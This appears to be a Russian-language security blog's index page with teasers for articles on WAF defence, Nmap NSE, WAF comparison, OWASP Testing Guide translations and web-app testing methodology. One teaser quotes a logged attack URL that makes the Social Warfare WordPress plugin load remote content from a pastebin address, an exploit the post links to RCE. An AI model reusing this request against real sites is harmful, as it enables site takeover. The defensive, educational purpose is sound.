15.10.2019 @ 18:50 «Мамкин» безопасник: защита сайта от хакерских атак Pentestit, WAF bypass, web security Популярность веб-приложений (к которым относятся сайты, интернет-магазины, личные кабинеты, API и т.д.), большой стек применяемых технологий, дефицит опытных разработчиков, а доступность различного инструментария и знаний в области тестирования на проникновения приводит к ожидаемым последствиям — компрометации веб-приложения. Давайте попробуем повысить его защищенность. Читать далее «Мамкин» безопасник: защита сайта от хакерских атак → Romanov Roman 7343 Web security Читать дальше >>
04.06.2019 @ 16:56 NSE или обратная сторона Nmap hacking, kali, kali linux 2.0, Nmap, NSE, penetration testing, pentest, Pentestit, безопасность сетевого периметра Кролики — это не только ценный мех, но и три — четыре килограмма диетического, легкоусвояемого мяса. Сегодня мы рассмотрим один из наиболее универсальных инструментов пентестера — Nmap — культовый кроссплатформенный сканер, который расшифровывается как «Network Mapper». Инструмент сам по себе довольно мощный, но его чаще всего используют в связке с другими утилитами, не предполагая, что, помимо способности сканировать сеть, Nmap имеет массу других возможностей. Основная из них — это использование скриптов с помощью NSE (Nmap Scripting Engine) — компонента Nmap, в основе которого лежит скриптовый язык Lua, напоминающий JavaScript. Именно NSE делает Nmap таким универсальным. Допустим, мы просканировали хост и увидели открытые порты: Читать далее NSE или обратная сторона Nmap → Hekpo 13588 Network security Читать дальше >>
27.05.2019 @ 22:57 Сравниваем бесплатные версии WAF: NAXSI vs Nemesida WAF Free naxsi, Nemesida WAF, Pentestit, SQL injection, WAF, WAF bypass, web security, XSS Сегодня мы хотим протестировать и сравнить работу двух бесплатных WAF: NAXSI и Nemesida WAF Free. В сравнении будут учитываться простота использования, качество предустановленных сигнатур, количество пропусков атак и частота ложных срабатываний. NAXSI расшифровывается как Nginx Anti XSS & SQL Injection. Работает по принципу: всё, что не разрешено — запрещено. Каждый HTTP-запрос (GET|PUT|POST) проверяется на соответствие шаблонам запрещающих правил, заданных по умолчанию в файле naxsi_core.rules. Эти правила охватывают 99% всех возможных вариантов зловредных запросов. Например, по умолчанию запрещены все запросы, в URI которых содержится символ двойной кавычки. Если для нормальной работы приложения такой символ необходим, то вручную нужно внести соответствующие исключения в белый список. Но есть и обратная сторона медали — если разрешающие правила будут проработаны плохо, то NAXSI будет блокировать еще и часть легитимных запросов. Поэтому ответственность за конечный результат разработчики модуля целиком и полностью возлагают на администратора системы. Как и большинство модулей для Nginx, NAXSI из репозитория недоступен, поэтому его придется вручную скачивать и компилировать. Nemesida WAF Free — бесплатная версия Nemesida WAF, представляющая собой динамический модуль для Nginx и обеспечивающая базовую защиту веб-приложения от атак класса OWASP на основе сигнатурного метода. Отличительной особенностью Nemesida WAF Free является собственная база сигнатур, выявляющая атаки на веб-приложения при минимальном количестве ложных срабатываний, а также: минимальные требования к аппаратным ресурсам; обновление из репозитория; установка и настройка за несколько минут; обработка содержимого всех типов HTTP-запроса; простота в обслуживании. Читать далее Сравниваем бесплатные версии WAF: NAXSI vs Nemesida WAF Free → Hekpo 9991 Web security Читать дальше >>
03.04.2019 @ 13:30 Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare Pentestit, RCE, Social Warfare, XSS Статья носит информационный характер. Не нарушайте законодательство. Некоторое время назад WAF зафиксировал атаку, которая имела следующий вид: https://defcon.ru/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf Из открытых источников мы узнали, что атака представляла собой попытку эксплуатации хранимой XSS уязвимости в Social Warfare — популярном WordpPress-плагине, установленном более чем на 70000 сайтов. Это показалось интересным и мы решили разобраться в уязвимости более детально. Читать далее Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare → Hekpo 5717 Web security Читать дальше >>
07.12.2017 @ 11:36 Перевод OWASP Testing Guide. Часть 3.9. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет о сохранении паролей. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Обход аутентификации Читать далее Перевод OWASP Testing Guide. Часть 3.9. → abychutkin 15817 Web security Читать дальше >>
26.07.2017 @ 14:13 Перевод OWASP Testing Guide. Часть 3.8. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет об обходе аутентификации. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Определение правил генерации имен пользователей Изучение передачи пользовательских данных Тестирование учетных данных по умолчанию Изучение механизма блокировки учетных записей Читать далее Перевод OWASP Testing Guide. Часть 3.8. → abychutkin 34810 Web security Читать дальше >>
22.06.2017 @ 12:05 Перевод OWASP Testing Guide. Часть 3.6. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет о учетных данных по умолчанию. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Определение правил генерации имен пользователей Изучение передачи пользовательских данных Читать далее Перевод OWASP Testing Guide. Часть 3.6. → abychutkin 11746 Web security Читать дальше >>
06.06.2017 @ 10:56 Перевод OWASP Testing Guide. Часть 3.5. owasp, web security Представляю вашему вниманию очередную часть перевода OWASP Testing Guide. В данной статье речь пойдет о передаче пользовательских данных. Предыдущие статьи Тестирование: введение и задачи Сбор информации с помощью поисковых систем Определение веб-сервера Поиск информации в метафайлах веб-сервера Определение веб-приложений на сервере Поиск утечек информации в комментариях и метаданных Определение точек входа веб-приложения Составление карты веб-приложения Определение фреймворка веб-приложения Определение веб-приложения Составление карты архитектуры веб-приложения Тестирование конфигурации инфраструктуры веб-приложения Изучение расширений файлов Поиск страрых версий веб-приложения, скрытых файлов и резервных копий Поиск административных интерфейсов Тестирование HTTP методов Тестирование HSTS Тестирование кросс-доменной политики Изучение ролей пользователей Тестирование процесса регистрации Предоставление учетных записей Определение имен пользователей Определение правил генерации имен пользователей Читать далее Перевод OWASP Testing Guide. Часть 3.5. → abychutkin 9288 Web security Читать дальше >>
27.02.2017 @ 14:13 Аудит Web-приложения – систематизируем тестирование Methodology, pentest, web security В предыдущей статье я рассмотрел методологию тестирования Web-приложения. Она не является обязательным стандартом, но поможет вам не пропустить уязвимости в больших проектах. Теперь я подробнее опишу каждый из этапов. Читать далее Аудит Web-приложения – систематизируем тестирование → leksadin 10077 Penetration testing Читать дальше >>
10.02.2017 @ 13:46 Методология тестирования Web-приложения Methodology, pentest, web security Во время тестирования Web-приложения и поиска уязвимостей в нём очень важно придерживаться некоторой методологии, иначе вы можете упустить что-нибудь важное. Чем крупнее приложение, тем важнее систематизированный подход. Читать далее Методология тестирования Web-приложения → leksadin 20835 Penetration testing Читать дальше >>